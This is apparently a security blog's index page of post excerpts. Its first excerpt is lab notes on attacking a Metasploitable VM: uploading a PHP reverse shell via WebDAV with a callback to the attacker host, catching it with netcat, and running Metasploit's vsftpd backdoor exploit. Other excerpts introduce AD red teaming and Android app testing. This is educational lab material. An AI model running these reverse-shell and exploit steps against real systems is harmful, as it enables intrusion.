Posts

Lab Key Notes - AD Red Team

Attacker Machine(192.168.50.2) - Victim Machine(Metasploitable)- (192.168.50.3) Perform at Attacker Machine: nc 192.168.50.3 80  --> Victim Machine OPTIONS http://192.168.50.3 host:192.168.50.3 OPTIONS http://192.168.50.3/dav/ HTTP/1.0 host:192.168.50.3 Upload php Web Shell: cadaver http://192.168.50.3/dav/ ls /usr/share/webshells/php/ nano /usr/share/webshells/php/php-reverse-shell.php change to ip: attacker machine (192.168.50.2) port: 1234 Upload shell: put /usr/share/webshells/php/php-reverse-shell.php Get Reverse Shell: nc -nlvp 1234 Basic Commands: $ ifconfig $ /sbin/ifconfig Tool: MSFConsole  $ msfconsole $ search vsftpd $ found ==> exploit/unix/ftp/vsftpd_234_backdoor $ use exploit/unix/ftp/vsftpd_234_backdoor $ show options $ set RHOSTS 192.168.50.3 (Victim Machine)  $ set verbose true $ run Get the command shell: whoami It launches a real bash shell through Python by attaching it to a pseudo-terminal, improving interactivity compared to just running /bin/b...

Active Directory - Red Teaming - Part 1

What is Red Teaming? Red teaming in Active Directory is the process of simulating real-world cyberattacks to identify weaknesses in an organization’s AD environment. It focuses on gaining initial access, escalating privileges, and moving laterally to reveal security gaps before real attackers exploit them. Red Teams are divided into 3 Groups: Red teams are typically divided into three groups: Cyber , which tests digital defenses through hacking simulations (e.g., network penetration, AD attacks); Social , which exploits human behavior using tactics like phishing or impersonation; and Physical , which attempts to bypass physical security by tailgating, lockpicking, or accessing restricted areas. Red Team Emulation Emulates (copies) the behavior of a specific real-world threat group—including their tools, techniques, and attack patterns. Example: Acting exactly like APT29, using the same phishing style, malware families, and stealthy lateral movement they are known for. Goal: Test how we...

Selenium - Setup Browser Driver

Image
 Create the Python file to set up the browser driver 

Android | Web View & Android Debuggable

Image
Web View Web View is used to render HTML codes in the Android view application. A WebView is a component in Android that lets you display web pages inside an app . Think of it like: A mini browser embedded inside your Android app. SetJavaScriptEnabled("True")  ==> Vulnerable for XSS Attack. Android Debuggable If an Android app isn’t marked as debuggable, its internal data—such as shared preferences, databases, cache, and other private files—cannot be accessed. Hardcoded Vulnerability Reversing Weak Cryptography Deprecated Algorithm

Android - Activity | Content Provider | Broadcast & Receiver | Services

Image
 Activity & Services using ADB Shell:  Using Drozer - Exploit the Content Providers  Exploit SharedPreference using adb shell SQLite Databases using ADB Local Storage using ADB DROZER Content Provider by using Drozer Broadcast and Receiver